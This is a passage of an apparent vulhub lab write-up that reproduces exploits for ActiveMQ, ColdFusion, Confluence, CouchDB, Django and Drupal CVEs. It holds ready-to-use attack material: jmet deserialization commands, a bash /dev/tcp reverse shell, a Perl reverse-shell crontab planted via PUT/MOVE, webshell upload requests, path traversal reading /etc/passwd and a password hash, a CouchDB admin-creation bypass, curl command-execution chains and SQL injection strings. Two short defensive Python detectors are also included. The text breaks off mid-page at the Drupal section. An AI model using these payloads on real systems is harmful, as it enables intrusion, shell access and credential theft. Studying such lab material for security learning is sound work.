After clicking Forward, we get in without logging in.

## ActiveMQ deserialization vulnerability (CVE-2015-5254)

After opening it, the page looks like this.

We downloaded the tool for this vulnerability from GitHub:

https://github.com/matthiaskaiser/jmet

After downloading, run the following command in Kali:

```
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
```

This produces the following output:

```
2021-10-29 08:51:27,771 main INFO sun.reflect.Reflection.getCallerClass is not supported. ReflectionUtil.getCallerClass will be much slower due to this. java.lang.ClassNotFoundException: sun.reflect.Reflection
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
        at java.base/java.lang.Class.forName0(Native Method)
        at java.base/java.lang.Class.forName(Class.java:315)
        at org.apache.logging.log4j.util.LoaderUtil.loadClass(LoaderUtil.java:122)
        at org.apache.logging.log4j.util.ReflectionUtil.<clinit>(ReflectionUtil.java:65)
        at org.apache.logging.log4j.core.selector.ClassLoaderContextSelector.getContext(ClassLoaderContextSelector.java:72)
        at org.apache.logging.log4j.core.impl.Log4jContextFactory.getContext(Log4jContextFactory.java:227)
        at org.apache.logging.log4j.core.impl.Log4jContextFactory.getContext(Log4jContextFactory.java:45)
        at org.apache.logging.log4j.LogManager.getContext(LogManager.java:174)
        at org.apache.logging.log4j.LogManager.getLogger(LogManager.java:618)
        at de.codewhite.jmet.target.JMSTarget.<init>(JMSTarget.java:24)
        at de.codewhite.jmet.target.impl.ActiveMQTarget.<init>(ActiveMQTarget.java:16)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
        at java.base/java.lang.Class.newInstance(Class.java:584)
        at de.codewhite.jmet.JMET.validateAndCreateTargets(JMET.java:196)
        at de.codewhite.jmet.JMET.setup(JMET.java:116)
        at de.codewhite.jmet.JMET.main(JMET.java:58)

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by ysoserial.payloads.util.Reflections (file:/home/kali/Desktop/tool/jmet-0.1.0-all.jar) to field com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl._bytecodes
WARNING: Please consider reporting this to the maintainers of ysoserial.payloads.util.Reflections
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
ERROR d.c.j.JMET [main] Failed to setup external libraries!
java.lang.ClassCastException: class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader (jdk.internal.loader.ClassLoaders$AppClassLoader and java.net.URLClassLoader are in module java.base of loader 'bootstrap')
        at de.codewhite.jmet.JMET.setupExternalLibs(JMET.java:167) [jmet-0.1.0-all.jar:?]
        at de.codewhite.jmet.JMET.setup(JMET.java:118) [jmet-0.1.0-all.jar:?]
        at de.codewhite.jmet.JMET.main(JMET.java:58) [jmet-0.1.0-all.jar:?]
INFO d.c.j.t.JMSTarget [main] Connected with ID: ID:kali-45299-1635511887894-0:1
INFO d.c.j.t.JMSTarget [main] Sent gadget "ROME" with command: "touch /tmp/success"
INFO d.c.j.t.JMSTarget [main] Shutting down connection ID:kali-45299-1635511887894-0:1
                                                                                            
```

I initially thought this meant an error, but when I carried on it turned out to be fine.

Append the following to the URL:

> /admin/browse.jsp?JMSDestination=event

(For some reason a popup asked for a username and password; I tried admin/admin and it let me in.)

This opens the following page.

The timestamps on the messages match up.

According to the official explanation, this is queue information.

Clicking on one of the queue messages leads to the following page.

Now enter the container:

```
docker-compose exec activemq bash
```

Enter the command:

```
ls /tmp/
```

Replace the command with a reverse shell one-liner and exploit again:

```
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8087 0>&1
```



Then command execution works.

Type exit to leave the docker container.

## ActiveMQ arbitrary file write vulnerability (CVE-2016-3088)

There are several ways to exploit the file write:

> write a webshell
> write a cron or ssh key file
> write a jar or a library/config file such as jetty.xml

The advantage of writing a webshell is that it is the easiest and most convenient, but as noted earlier, fileserver does not parse jsp, and both the admin and api applications require login, so it is a bit of a dud; writing cron or an ssh key has the advantage of giving a reverse shell directly, which is also convenient, but the drawback is that it needs root privileges; writing a jar is slightly more troublesome (it needs a backdoored jar); writing the xml config file is a fairly reliable method, but its weak point is that we need to know the absolute path of activemq.

---

After entering, the page looks the same as above.

### Writing a webshell directly

Append the following to the URL:

```
/admin/test/systemProperties.jsp
```

to see ActiveMQ's absolute path.

Then the file can be uploaded with the PUT method; after capturing with Burp Suite, replace the request with:

```
PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

webshell...


```

Then move the webshell into the api folder under the web directory (`/opt/activemq/webapps/api/s.jsp`):

Change the request to:

```
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: 127.0.0.1:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0


```

The webshell can then be accessed at IP-address:8161/api/s.jsp

The page content (viewing the source) is:

```
webshell...
```

### Writing to crontab for an automatic reverse shell

This is a fairly robust method. First upload the cron configuration file (note: line breaks must be `\n`, not `\r\n`, otherwise crontab execution will fail):

After capturing, change the request to:

```
PUT /fileserver/1.txt HTTP/1.1
Host: 127.0.0.1:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


```

Move it to `/etc/cron.d/root`:

Change the request to:

```
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0


```

Reverse shell obtained.

This method requires ActiveMQ to run as root; otherwise the cron file cannot be written either.
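A defender-side check for the two write patterns walked through in this post and in the Tomcat one above (a PUT of a JSP with a trailing slash; PUT and MOVE against the ActiveMQ fileserver, with a `file:` Destination), as an added example that is not from the post: a small parser for raw requests as captured in Burp and a rule function over them. The sample requests are trimmed copies of the ones shown; the GET is a constructed benign request for comparison.

```python
from typing import Dict, List, Tuple

# Requests copied (headers shortened) from the captures shown in this post and the
# Tomcat one above; BENIGN_GET is constructed.
TOMCAT_PUT = (
    "PUT /1.jsp/ HTTP/1.1\r\nHost: your-ip:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\n\r\nshell"
)
AMQ_PUT = "PUT /fileserver/1.txt HTTP/1.1\r\nHost: 127.0.0.1:8161\r\nContent-Length: 248\r\n\r\n..."
AMQ_MOVE = (
    "MOVE /fileserver/1.txt HTTP/1.1\r\nDestination: file:///etc/cron.d/root\r\n"
    "Host: localhost:8161\r\nContent-Length: 0\r\n\r\n"
)
BENIGN_GET = "GET /admin/index.jsp HTTP/1.1\r\nHost: 127.0.0.1:8161\r\n\r\n"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, headers); header names are lower-cased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, path = request_line.split(" ")[:2]
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers


def flag_write_request(raw: str) -> List[str]:
    """Return the reasons a request matches one of the file-write patterns discussed above."""
    method, path, headers = parse_request(raw)
    reasons: List[str] = []
    if method in ("PUT", "MOVE"):
        reasons.append(f"write method {method}")
    # CVE-2017-12615 shape: the target is a JSP once the trailing '/' is stripped.
    if method == "PUT":
        target = path.rstrip("/")
        if target.lower().endswith(".jsp"):
            reasons.append("PUT of a .jsp" + (" via trailing slash" if target != path else ""))
    # CVE-2016-3088 shape: writes to the fileserver application, then a MOVE whose
    # Destination is a file: URL pointing anywhere on the filesystem.
    if method in ("PUT", "MOVE") and path.lower().startswith("/fileserver/"):
        reasons.append("write to /fileserver/")
    destination = headers.get("destination", "")
    if method == "MOVE" and destination.lower().startswith("file:"):
        reasons.append(f"MOVE with file: destination {destination}")
    return reasons


if __name__ == "__main__":
    for sample in (TOMCAT_PUT, AMQ_PUT, AMQ_MOVE, BENIGN_GET):
        print(sample.split("\r\n", 1)[0], "->", flag_write_request(sample))
```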

### Writing jetty.xml or a jar

In theory we could overwrite jetty.xml to remove the login restriction on admin and api, then write a webshell.

In some cases jetty.xml and the jar are owned by the web container's user, so by comparison writing crontab has a higher success rate.

Not yet tested.

Posted by the thread starter on 2021-10-30 21:40:51
## Adobe ColdFusion file read vulnerability (CVE-2010-2861)

After opening it, the page looks like this (apparently just a directory listing).

Visiting http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en directly reads the file /etc/passwd:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
```

![image-20211030092138477](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030092138477.png)

Read the backend administrator password via http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:

```
rdspassword=
password=D033E22AE348AEB5660FC2140AEC35850C4DA997
encrypted=true" class="buttn-fix">
```

![image-20211030092321404](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030092321404.png)

## Adobe ColdFusion deserialization vulnerability (CVE-2017-3066)

Opening it shows this:

```
<div id="header"></div>
        <div id="spot">
            <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANAAA
            ****
            AAAABJRU5ErkJggg=="/>
            <div id="title">404</div>
        </div>
        <div id="content">                       
                <div id="error">
                        The page you are trying to access can not be displayed. Please try again or notify the administrator.                         
                </div>          
        </div>
```

![image-20211030093335576](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030093335576.png)

Next we visit the URL: http://127.0.0.1:8500/CFIDE/administrator/index.cfm

![image-20211030093724476](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030093724476.png)

and enter the password vulhub, which brings up the following screen:

![image-20211030094128611](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030094128611.png)

This seems to indicate that Adobe ColdFusion was installed successfully.



We use the ColdFusionPwn tool from the reference link (https://github.com/codewhitesec/ColdFusionPwn) to generate the POC:

```
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
```

The POC is generated in the poc.ser file; send it as the request body to http://your-ip:8500/flex2gateway/amf with Content-Type application/x-amf:

```
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]


```

Entering the container, /tmp/success has been created successfully:

Changing the POC to a reverse-shell command, a shell is obtained



## Atlassian Confluence path traversal and command execution vulnerability (CVE-2019-3396)


Opening it looks like this (visit IP address:8090):

![image-20211030101005010](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030101005010.png)

Select "Trial installation"; you will then be asked for a license key. Click "Get an evaluation license" and apply to Atlassian for a Confluence Server evaluation license (do not select Data Center or Addons):

![image-20211030101115454](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030101115454.png)



Then click Next to install. This step may fail or take a long time on a small-memory VPS (a machine with more than 4 GB of memory is recommended for installation and testing), so please be patient.

![image-20211030102910407](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030102910407.png)

If prompted for a cluster node, enter the path /home/confluence:

![image-20211030102955181](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030102955181.png)

You may later be asked for database credentials; choose the postgres database, host db, username and password both postgres:

![image-20211030103538160](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030103538160.png)

Send the following request to read the file web.xml:

```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
```

Confluence before 6.12 did not restrict the protocol or path for file reads, so file:///etc/passwd can be used to read files and https://... to load remote files.

The file is a Velocity template, so arbitrary commands can be executed through template injection (SSTI):

## CouchDB vertical privilege bypass vulnerability (CVE-2017-12635)

After visiting IP address:5984, the following page appears:

```
{"couchdb":"Welcome","version":"2.1.0","features":["scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
```

![image-20211030111553764](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030111553764.png)

After capturing the request, modify the packet as follows:

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90


{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}


```

![image-20211030112210226](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112210226.png)

Send it to the Repeater module and click Send; the following response is returned:

```
HTTP/1.1 403 Forbidden
X-CouchDB-Body-Time: 0
X-Couch-Request-ID: 6d36cb3727
Server: CouchDB/2.1.0 (Erlang OTP/17)
Date: Sat, 30 Oct 2021 03:23:47 GMT
Content-Type: application/json
Content-Length: 59
Connection: close
Cache-Control: must-revalidate

{"error":"forbidden","reason":"Only _admin may set roles"}

```

It is a 403, and according to the hint only admin users can create users, so we modify the packet as follows:

Sending a packet containing two roles fields bypasses the restriction:

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}


```
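As an added example (not code from the post or from CouchDB), the Python below shows why two `roles` members slip past the check: a parser that keeps the first duplicate and one that keeps the last hand the application different `roles` values, while a parser that rejects duplicates outright closes the gap. The document text is constructed from the request above; the two parsing policies are named by assumption and are not CouchDB's own code.

```python
"""Duplicate JSON keys: the disagreement behind the CVE-2017-12635 bypass."""
import json
from typing import Any, Dict, List, Tuple

# Constructed sample: the body of the bypass request above, with two "roles" members.
USER_DOC_WITH_DUPLICATE_ROLES = '''{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}'''

# Constructed sample: the same document with a single, unprivileged "roles" member.
USER_DOC_CLEAN = '{"type": "user", "name": "vulhub", "roles": [], "password": "vulhub"}'


class DuplicateKeyError(ValueError):
    """Raised when a JSON object repeats a member name."""


def _first_wins(pairs: List[Tuple[str, Any]]) -> Dict[str, Any]:
    """Keep the first occurrence of each key (one policy a parser may follow)."""
    out: Dict[str, Any] = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def _last_wins(pairs: List[Tuple[str, Any]]) -> Dict[str, Any]:
    """Keep the last occurrence of each key (the other common policy)."""
    return dict(pairs)


def _reject_duplicates(pairs: List[Tuple[str, Any]]) -> Dict[str, Any]:
    """Refuse any object that repeats a key instead of silently picking one."""
    out: Dict[str, Any] = {}
    for key, value in pairs:
        if key in out:
            raise DuplicateKeyError(f"duplicate key {key!r}")
        out[key] = value
    return out


def roles_seen_by_each_parser(text: str) -> Dict[str, Any]:
    """Show which 'roles' value each parsing policy hands to the application."""
    return {
        "first_wins": json.loads(text, object_pairs_hook=_first_wins)["roles"],
        "last_wins": json.loads(text, object_pairs_hook=_last_wins)["roles"],
    }


def has_duplicate_keys(text: str) -> bool:
    """True if any object in the document repeats a member name."""
    try:
        json.loads(text, object_pairs_hook=_reject_duplicates)
    except DuplicateKeyError:
        return True
    return False


def parse_user_doc_strict(text: str) -> Dict[str, Any]:
    """Parse a _users document, rejecting duplicate keys and privileged roles."""
    doc = json.loads(text, object_pairs_hook=_reject_duplicates)
    if "_admin" in doc.get("roles", []):
        raise PermissionError("only _admin may set roles")
    return doc


if __name__ == "__main__":
    print(roles_seen_by_each_parser(USER_DOC_WITH_DUPLICATE_ROLES))
    print("duplicate keys:", has_duplicate_keys(USER_DOC_WITH_DUPLICATE_ROLES))
```

If a validation layer and a storage layer apply different policies to the same document, the validator sees `[]` while the stored record carries `["_admin"]`; rejecting duplicates before either layer runs removes the ambiguity.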

The response returns the following:

```
HTTP/1.1 201 Created
X-CouchDB-Body-Time: 0
X-Couch-Request-ID: 158909b2de
Server: CouchDB/2.1.0 (Erlang OTP/17)
Location: http://127.0.0.1:5984/_users/org.couchdb.user:vulhub
ETag: "1-30586bebc2032fee0301d4a8f5fbcf1d"
Date: Sat, 30 Oct 2021 03:25:57 GMT
Content-Type: application/json
Content-Length: 86
Connection: close
Cache-Control: must-revalidate

{"ok":true,"id":"org.couchdb.user:vulhub","rev":"1-30586bebc2032fee0301d4a8f5fbcf1d"}

```



An administrator was created successfully, username and password both `vulhub`:

![image-20211030112642296](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112642296.png)

Visiting `http://127.0.0.1:5984/_utils/` again and entering the username and password `vulhub` logs in successfully:

![image-20211030112831069](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112831069.png)

(It looks a bit like Ubuntu)

After logging in:

![image-20211030112856977](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112856977.png)

## CouchDB arbitrary command execution vulnerability (CVE-2017-12636)

Opening it shows this:

```
{"couchdb":"Welcome","uuid":"c5828d04ac9d9f1b1da494b337b01e52","version":"1.6.0","vendor":{"version":"1.6.0","name":"The Apache Software Foundation"}}
```

![image-20211030151106643](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030151106643.png)

Then, following the CVE-2017-12635 reproduction above, capture the request and modify the packet as follows (adding an administrator user):

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}


```

Then run the following commands in sequence on the command line:

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

```

![image-20211030152719664](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030152719664.png)

```
┌──(root㉿kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# curl -X PUT 'http://vulhub:vulhub@127.0.0.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
{"ok":true,"id":"vul","rev":"1-967a00dff5e02add41819138abb3284d"}

┌──(root㉿kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# curl -X POST 'http://vulhub:vulhub@127.0.0.1:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
{"error":"EXIT","reason":"{{badmatch,{error,{bad_return_value,{os_process_error,{exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n                       [{file,\"couch_query_servers.erl\"},{line,477}]},\n  {couch_query_servers,lang_proc,3,\n                       [{file,\"couch_query_servers.erl\"},{line,462}]},\n  {couch_query_servers,handle_call,3,\n                       [{file,\"couch_query_servers.erl\"},{line,334}]},\n  {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,580}]},\n  {proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,237}]}]}"}

┌──(root㉿kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# docker exec -it 8120b3a96a88 bash
root@8120b3a96a88:/var/lib/couchdb# ls
root@8120b3a96a88:/var/lib/couchdb# ls /tmp
success
root@8120b3a96a88:/var/lib/couchdb#

```

Reproduction complete.



## Django debug page XSS vulnerability (CVE-2017-12794)

Visiting IP address:8000 gives the following page:

```
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; background:#eee; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; margin-bottom:.4em; }
    h1 span { font-size:60%; color:#666; font-weight:normal; }
    table { border:none; border-collapse: collapse; width:100%; }
    td, th { vertical-align:top; padding:2px 3px; }
    th { width:12em; text-align:right; color:#666; padding-right:.5em; }
    #info { background:#f6f6f6; }
    #info ol { margin: 0.5em 4em; }
    #info ol li { font-family: monospace; }
    #summary { background: #ffc; }
    #explanation { background:#eee; border-bottom: 0px none; }

  <div id="summary">
    <h1>Page not found <span>(404)</span></h1>
    <table class="meta">
      <tr>
        <th>Request Method:</th>
        <td>GET</td>
      </tr>
      <tr>
        <th>Request URL:</th>
        <td>http://127.0.0.1:8000/</td>

  <div id="info">
   
      <p>
      Using the URLconf defined in <code>__main__</code>,
      Django tried these URL patterns, in this order:
      </p>

        
          <li>
                ^create_user/$
          </li>

      <p>
        The empty path didn't match any of these.
      </p>
   
    <p>
      You're seeing this error because you have <code>DEBUG = True</code> in
      your Django settings file. Change that to <code>False</code>, and Django
      will display a standard 404 page.
    </p>
```

![image-20211030154957632](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030154957632.png)

Then append the following to the URL

```
/create_user/?username=<script>alert(1)</script>
```

After visiting, the page shows:

```
Hello, user has been created!
```

![image-20211030155540029](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030155540029.png)

Then visit again:

```
/create_user/?username=<script>alert(1)</script>
```

The popup is triggered:

![image-20211030155701235](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030155701235.png)

As can be seen, the exception thrown by Postgres is

```
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
```

This exception is concatenated into

```
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception
```

which finally triggers the XSS.



## Django < 2.0.8 arbitrary URL redirect vulnerability (CVE-2018-14574)

Visiting IP address:8000 gives the following page:

```
Hello, world.
```

![image-20211030161108283](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030161108283.png)

Visit: 127.0.0.1:8000//www.example.com

It redirects to the following page, showing that the redirect has taken place:

```
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
        
    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>   
</head>

<body>
<div>
    <h1>Example Domain</h1>
    <p>This domain is for use in illustrative examples in documents. You may use this
    domain in literature without prior coordination or asking for permission.</p>
    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
```

![image-20211030161601095](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030161601095.png)





## Django JSONField/HStoreField SQL injection vulnerability (CVE-2019-14234)

Visiting IP address:8000 gives the following page:

![image-20211030162708407](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162708407.png)

Then log into the backend at IP address:8000/admin/, username admin, password a123123123

![image-20211030162901818](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162901818.png)



![image-20211030162925790](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162925790.png)

After logging into the backend, go to the management page of the Collection model at IP address:8000/admin/vuln/collection/:

![image-20211030163036446](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030163036446.png)

Then construct detail__a'b=123 in the GET parameters and submit it, where detail is the JSONField of the Collection model:

**IP address:8000/admin/vuln/collection/?detail__a%27b=123**

The following error is returned:

```
ProgrammingError at /admin/vuln/collection/

syntax error at or near "b') = '"
LINE 1: ...llection" WHERE ("vuln_collection"."detail" -> 'a'b') = '"12...
                                                             ^

Request Method:         GET
Request URL:         http://127.0.0.1:8000/admin/vuln/collection/?detail__a%27b=123
Django Version:         2.2.3
Exception Type:         ProgrammingError
Exception Value:        

syntax error at or near "b') = '"
LINE 1: ...llection" WHERE ("vuln_collection"."detail" -> 'a'b') = '"12...
                                                             ^

Exception Location:         /usr/local/lib/python3.6/site-packages/django/db/backends/utils.py in _execute, line 84
Python Executable:         /usr/local/bin/python
Python Version:         3.6.9
Python Path:        

['/usr/src',
'/usr/local/lib/python36.zip',
'/usr/local/lib/python3.6',
'/usr/local/lib/python3.6/lib-dynload',
'/usr/local/lib/python3.6/site-packages']

Server time:         Sat, 30 Oct 2021 08:31:49 +0000
```

![image-20211030163240710](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030163240710.png)



## Django GIS SQL injection vulnerability (CVE-2020-9402)

Visiting IP address:8000 gives the following:

Vulnerability 1

First visit http://your-ip:8000/vuln/.

On this page, use a GET request to construct the q parameter with the SQL injection string **20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1**

**http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1**

As can be seen, the parenthesis injection succeeded and the SQL query errored:

Vulnerability 2

Visit http://your-ip:8000/vuln2/. On this page, use a GET request to construct the q parameter with the SQL injection string **0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --**

**http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--**






## Drupal < 7.32 "Drupalgeddon" SQL injection vulnerability (CVE-2014-3704)

Opening it looks like this:

```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
  <head>
